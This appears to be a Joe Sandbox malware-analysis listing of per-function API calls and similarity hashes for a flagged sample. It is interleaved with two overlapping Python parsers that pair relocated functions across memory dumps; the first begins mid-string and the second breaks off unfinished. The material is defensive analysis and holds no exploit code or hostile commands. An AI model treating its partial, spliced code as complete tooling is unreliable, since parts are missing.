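• GetLastError.KERNEL32(?,?,?,?,046E8840,?,?,?,?,00000000,?,00000000), ref: 046E288E
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
• Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
• Instruction ID: 7286acd02852c8461b2bf073841a2722c5f623e2d4d1ac7684a653653c26f896
APIs
  • Part of subcall function 00412702: TlsAlloc.KERNEL32(?,00410B49), ref: 00412708
• TlsAlloc.KERNEL32(?,00410B49), ref: 0042398F
• GetLastError.KERNEL32 ref: 004239A1
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
• Instruction ID: 8833b9f6cd7e760378b88f767ee398d002a6a14adc7a97d59b2328b94074dca1
APIs
  • Part of subcall function 046E2969: TlsAlloc.KERNEL32(?,046E0DB0), ref: 046E296F
• TlsAlloc.KERNEL32(?,046E0DB0), ref: 046F3BF6
• GetLastError.KERNEL32 ref: 046F3C08
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
• Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
• Instruction ID: 493e0f708939d063128a366351bfe1fa6376e2741f8256ca69cb0622df35d74c
APIs
• std::_Cnd_initX.LIBCPMT ref: 046D5A99
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
• Opcode ID: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
• Instruction ID: 2840da2cce294455ba411b6a7cf8d5ae4200353fd39f0b525cfe3bb543c61529
"""

# "• Name.LIB(args), ref: 00412618" or "• Name.LIB ref: 00412618"
API_RE = re.compile(r"^•\s*(?P<api>[^\s(]+?)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")
KV_RE = re.compile(r"^•\s*(Opcode ID|Instruction ID):\s*(\S+)")


@dataclass
class FuncEntry:
    apis: list = field(default_factory=list)  # (api name, ref address) in listing order
    dump_file: str = ""
    base: int = 0          # dump load address ("Offset:")
    pe_backed: bool = False
    opcode_id: str = ""
    instruction_id: str = ""

    @property
    def first_ref(self) -> int:
        return self.apis[0][1]

    @property
    def rva(self) -> int:  # position of the first API ref relative to the dump base
        return self.first_ref - self.base


def parse_entries(text: str) -> list[FuncEntry]:
    """Parse the listing into entries; subcall lines are skipped so first_ref is a direct ref."""
    entries: list[FuncEntry] = []
    cur: FuncEntry | None = None
    for raw in text.splitlines():
        s = raw.strip()
        if s == "APIs":
            cur = FuncEntry()
            entries.append(cur)
            continue
        if cur is None or s.startswith("• Part of subcall"):
            continue
        if (m := API_RE.match(s)):
            cur.apis.append((m["api"], int(m["ref"], 16)))
        elif (m := SRC_RE.search(s)):
            cur.dump_file, cur.base, cur.pe_backed = m["file"], int(m["base"], 16), m["pe"] == "true"
        elif (m := KV_RE.match(s)):
            setattr(cur, m[1].lower().replace(" ", "_"), m[2])
    return [e for e in entries if e.apis and e.opcode_id]


def relocated_pairs(entries: list[FuncEntry]) -> list[tuple[FuncEntry, FuncEntry, int]]:
    """(pe_entry, non_pe_entry, shift) for every Opcode ID present in both kinds of dump."""
    groups: dict[str, list[FuncEntry]] = defaultdict(list)
    for e in entries:
        groups[e.opcode_id].append(e)
    return [(a, b, b.rva - a.rva)
            for group in groups.values()
            for a in group if a.pe_backed
            for b in group if not b.pe_backed]


def uniform_shift(pairs) -> int | None:
    """The single base-relative shift shared by all pairs, or None if they disagree."""
    shifts = {shift for _, _, shift in pairs}
    return shifts.pop() if len(shifts) == 1 else None


if __name__ == "__main__":
    found = parse_entries(SAMPLE)
    pairs = relocated_pairs(found)
    for a, b, shift in pairs:
        print(f"{a.apis[0][0]:<40} {a.first_ref:08X} -> {b.first_ref:08X}  shift +{shift:#x}")
    print("uniform shift:", uniform_shift(pairs))
```

On the excerpt every pair comes out at the same shift of 0x267 bytes from its dump base, which is what one expects when the non-PE region holds the original image's code laid out slightly differently rather than freshly generated code; the 0x400000 entries carry no "Yara matches" header while the 0x46D0000 copies do, so pairing the two lets an analyst attribute each rule hit to the matching function in the PE-backed image before looking at the bytes.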
                                                      APIs
                                                      • std::_Cnd_initX.LIBCPMT ref: 046D5A99
                                                      • __Cnd_signal.LIBCPMT ref: 046D5AA5
                                                      • std::_Cnd_initX.LIBCPMT ref: 046D5ABA
                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 046D5AC1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                      • String ID:
                                                      • API String ID: 2059591211-0
                                                      • Opcode ID: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction ID: 2840da2cce294455ba411b6a7cf8d5ae4200353fd39f0b525cfe3bb543c61529
                                                      • Opcode Fuzzy Hash: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction Fuzzy Hash: 0CF0E531801701ABF7317B71D80676A77E0AF4172DF14482DE0965A990FFFAB8448A5D
                                                      APIs
                                                      • ___crtCreateEventExW.LIBCPMT ref: 0041233C
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00410B49), ref: 0041234A
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412360
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041236E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                      • String ID:
                                                      • API String ID: 200240550-0
                                                      • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction ID: 7d54c7eb8c1df5617d0240cb21a080299d67000da4f0f446ba4d98586b5c168f
                                                      • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction Fuzzy Hash: 82E0D87160021A29E714B7768D03FBF369CAB00B45F54086BBE28E51C3FDACD51041AC
                                                      APIs
                                                      • ___crtCreateEventExW.LIBCPMT ref: 046E25A3
                                                      • GetLastError.KERNEL32(?,?,?,?,?,046E0DB0), ref: 046E25B1
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E25C7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E25D5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                      • String ID:
                                                      • API String ID: 200240550-0
                                                      • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction ID: bd6f76cd608316a111380b91f6c817d2d725e90c983381b9bdbf8c8b3ac3b63a
                                                      • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction Fuzzy Hash: 90E0D861A0021A39F714B7758C22F7B36DC5B00A45F980895F954D61C1FA58F50441A8
                                                      APIs
                                                        • Part of subcall function 00412702: TlsAlloc.KERNEL32(?,00410B49), ref: 00412708
                                                      • TlsAlloc.KERNEL32(?,00410B49), ref: 0042398F
                                                      • GetLastError.KERNEL32 ref: 004239A1
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239B7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004239C5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3735082963-0
                                                      • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction ID: 8833b9f6cd7e760378b88f767ee398d002a6a14adc7a97d59b2328b94074dca1
                                                      • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction Fuzzy Hash: F1E02BB45002205EC300BF76AD4A66E7274B5013067500E2FF051C2192EEBCD1894AAD
                                                      APIs
                                                        • Part of subcall function 046E2969: TlsAlloc.KERNEL32(?,046E0DB0), ref: 046E296F
                                                      • TlsAlloc.KERNEL32(?,046E0DB0), ref: 046F3BF6
                                                      • GetLastError.KERNEL32 ref: 046F3C08
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046F3C1E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F3C2C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3735082963-0
                                                      • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction ID: 493e0f708939d063128a366351bfe1fa6376e2741f8256ca69cb0622df35d74c
                                                      • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction Fuzzy Hash: 1DE061B44003126FD304BF725C4457E32D86A00609B100E7AE651D32A0FE34F045465D
                                                      APIs
                                                      • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B49,?,?,?,00000000), ref: 00412547
                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412556
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041256C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041257A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                      • String ID:
                                                      • API String ID: 3016159387-0
                                                      • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction ID: d1080d8484ae9d83b6d0ba61fc71b207615b60f889e64149bc2ecbf16b0e0fcc
                                                      • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction Fuzzy Hash: 05E0487460010AABC714EBB5DE49AEF73BC7A00A45B600466A505E3151EA6CDB08877D
                                                      APIs
                                                      • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,046E0DB0,?,?,?,00000000), ref: 046E27AE
                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 046E27BD
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E27D3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E27E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                      • String ID:
                                                      • API String ID: 3016159387-0
                                                      • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction ID: 8850b9ac00f849e3330e2b8b981e2ffbfd33cbd699d00aaf11d518d8bb57d28c
                                                      • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction Fuzzy Hash: 31E0DF7460120AA7DB04FBB28D49ABF33FC6A00A05B6004A5A101E3140FB28E6088779
                                                      APIs
                                                      • SetThreadPriority.KERNEL32(?,?), ref: 004126A1
                                                      • GetLastError.KERNEL32 ref: 004126AD
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126C3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004126D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                      • String ID:
                                                      • API String ID: 4286982218-0
                                                      • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction ID: 6d46e794ce675b14b4e777207d95778e75921e513829d010cf910108d867a6c0
                                                      • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction Fuzzy Hash: A0E086346001197BCB14BF61DD06BFF776CBB00745B50082BB515D21A2EE7DD56486AC
                                                      APIs
                                                      • TlsSetValue.KERNEL32(?,00000000,00417981,00000000,?,?,00410B49,?,?,?,00000000,?,00000000), ref: 00412767
                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412773
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412789
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412797
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                      • String ID:
                                                      • API String ID: 1964976909-0
                                                      • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction ID: fc0abd33e3506043c740cb9e36e94ef10b6ca8cd9ab3df5cd7633b5f59798732
                                                      • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction Fuzzy Hash: 8AE086346001196BDB10BF61DD0ABFF77ACBF00745B50082AB515D21A2EE7DD56486EC
                                                      APIs
                                                      • SetThreadPriority.KERNEL32(?,?), ref: 046E2908
                                                      • GetLastError.KERNEL32 ref: 046E2914
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E292A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E2938
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                      • String ID:
                                                      • API String ID: 4286982218-0
                                                      • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction ID: f10aab5882ace15e34ce8d04059a77030267e951774a396df2a32fd09f5b7018
                                                      • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction Fuzzy Hash: ADE0867510011A77DB14BF72EC05BBB37AD6B00A45B5409A5B555D20A0FF35E104866C
                                                      APIs
                                                      • TlsSetValue.KERNEL32(?,00000000,046E7BE8,00000000,?,?,046E0DB0,?,?,?,00000000,?,00000000), ref: 046E29CE
                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 046E29DA
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E29F0
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E29FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                      • String ID:
                                                      • API String ID: 1964976909-0
                                                      • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction ID: c073442372fc3e5f804781d2f9fa6defa117aa92a648f09cb287b268294d4680
                                                      • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction Fuzzy Hash: 4BE0863510011A77EB14BF72DC09BBB37ED6F00645B540965BA59D60A0FB35F114969C
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,00410B49), ref: 00412708
                                                      • GetLastError.KERNEL32 ref: 00412715
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041272B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3103352999-0
                                                      • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction ID: ae4cec7b8514c973035fdd40d9049bb060c9e6426e6cb98910bf6ccd7d8594f9
                                                      • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction Fuzzy Hash: 7FE0C234500119678718BB75AE4AABF7368BA01759BA00A2BF171D21E2FFACD45846AC
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,046E0DB0), ref: 046E296F
                                                      • GetLastError.KERNEL32 ref: 046E297C
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E2992
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E29A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3103352999-0
                                                      • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction ID: 3ec7eb9769e7b5ea2762ca4fda129351eb453d78a9c18263e194eaaa2b78dfad
                                                      • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction Fuzzy Hash: 22E0C230000116679718BB76AC58ABB72AD6B01719BA40BA9E1A1D30E0FB68E00842AC
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 0042F11D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                      • Instruction ID: 8e169e9360580ca493d47f0c0c757dc5712737ee0a62320f354c2119d5e44c11
                                                      • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                      • Instruction Fuzzy Hash: 1C515C61B04302D6CB117714E94137BA7A0EB54B00FE4597FF4D1823A9EE2E8CA99A4F
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0D4,?,00000050,?,?,?,?,?), ref: 0043AF54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction ID: 2243d02fd8148dd9ec2f33991059bb206d05c053167233329e98fe35075abcd7
                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction Fuzzy Hash: BC2138A2AC0100A6DB30CB64C906B977396EB6CB15F529526E98AC7300F73ADD21C35E
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0470B33B,?,00000050,?,?,?,?,?), ref: 0470B1BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction ID: 4de484fff4201c174cbf6a1e7399986b03c35813abd28c86d7579958c4c4c986
                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction Fuzzy Hash: 40219D62B42204E6EB249FA5CD01BA763EAEF44B50F46C424E909D7389F732FB00C394
                                                      APIs
                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F32
                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: EncodersGdipImage$Size
                                                      • String ID: image/png
                                                      • API String ID: 864223233-2966254431
                                                      • Opcode ID: 46e06415d47cef216651a1ceb0941a1122d06094d99f4b809e1aea25a43a6a14
                                                      • Instruction ID: 1ac231c862dfa1d4f9d2a87bc7d89be22634d28e92dbc51b0da411a030b342b9
                                                      • Opcode Fuzzy Hash: 46e06415d47cef216651a1ceb0941a1122d06094d99f4b809e1aea25a43a6a14
                                                      • Instruction Fuzzy Hash: 7B119476D0010AAFCB119FA59C4149EBB75FF41361B60027BEC10B31A0CB795E559A58
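The records above repeat the same function twice: once from the dump at offset 00400000 ("based on PE: true", the mapped image) and once from the region at 046D0000 ("based on PE: false", the region carrying the Yara matches). In each pair the Opcode ID is identical while the Instruction ID and the call-site addresses differ, which is what a relocated copy of the same code looks like when only operands changed. The parser below is an added example, not Joe Sandbox code: it reads records in the format shown on this page (a record opens at an "APIs" header and carries its Memory Dump Source and Similarity block), groups them by Opcode ID, pairs functions that appear in both a PE-backed and a non-PE-backed dump, and reports the delta between their dump-relative call-site addresses. For the pairs embedded below (copied from this page and trimmed, so the sample input is constructed) the delta is a constant 0x267, so the 046D0000 region holds a shifted copy of the image's code rather than unrelated code that happens to share a hash. The record field layout is inferred from this page and is an assumption; a full report may carry sections this parser ignores.

```python
"""Parse Joe Sandbox per-function records and cross-reference them across memory dumps.

Added example, not Joe Sandbox code. The record layout is inferred from the records on
this page: each record opens at an "APIs" header and then carries "Memory Dump Source",
"Joe Sandbox IDA Plugin", optionally "Yara matches", and a "Similarity" block.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# Matches "TlsAlloc.KERNEL32(?,00410B49), ref: 00412708" and "GetLastError.KERNEL32 ref: 00412715"
API_RE = re.compile(r"^(?P<name>[^.(]+)\.(?P<module>[A-Z0-9_]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
DUMP_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)        # (api name, module, call-site address)
    dump_offset: int = 0                            # base address of the dump the function came from
    pe_backed: bool = False                         # "based on PE: true" means a mapped image, not a raw region
    yara_match: bool = False                        # record carried a "Yara matches" header
    similarity: dict = field(default_factory=dict)  # Opcode ID, Instruction ID, fuzzy hashes, String ID, ...


def parse_records(text):
    """Split the report text into FunctionRecord objects, one per "APIs" header."""
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                      # every record opens with its API list
                cur = FunctionRecord()
                records.append(cur)
            elif line == "Yara matches" and cur is not None:
                cur.yara_match = True
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()                     # drop the bullet
        if section == "APIs" and (m := API_RE.match(body)):
            cur.apis.append((m["name"], m["module"], int(m["ref"], 16)))
        elif section == "Memory Dump Source" and (m := DUMP_RE.search(body)):
            cur.dump_offset, cur.pe_backed = int(m["offset"], 16), m["pe"] == "true"
        elif section == "Similarity":
            key, _, value = body.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return records


def relocated_functions(records):
    """Pair records by Opcode ID that occur in both a PE-backed and a non-PE-backed dump.

    Returns {opcode_id: (api_name, rva_in_image, rva_in_region, delta)} where the RVAs are the
    call site of the same API relative to each dump's base. A constant delta across all pairs
    means the region is a shifted copy of the image's code.
    """
    by_opcode = defaultdict(list)
    for r in records:
        if r.similarity.get("Opcode ID"):
            by_opcode[r.similarity["Opcode ID"]].append(r)
    pairs = {}
    for oid, recs in by_opcode.items():
        backed = [r for r in recs if r.pe_backed and r.apis]
        unbacked = [r for r in recs if not r.pe_backed and r.apis]
        if not (backed and unbacked):
            continue
        a, b = backed[0], unbacked[0]
        name, _, ref_a = a.apis[0]
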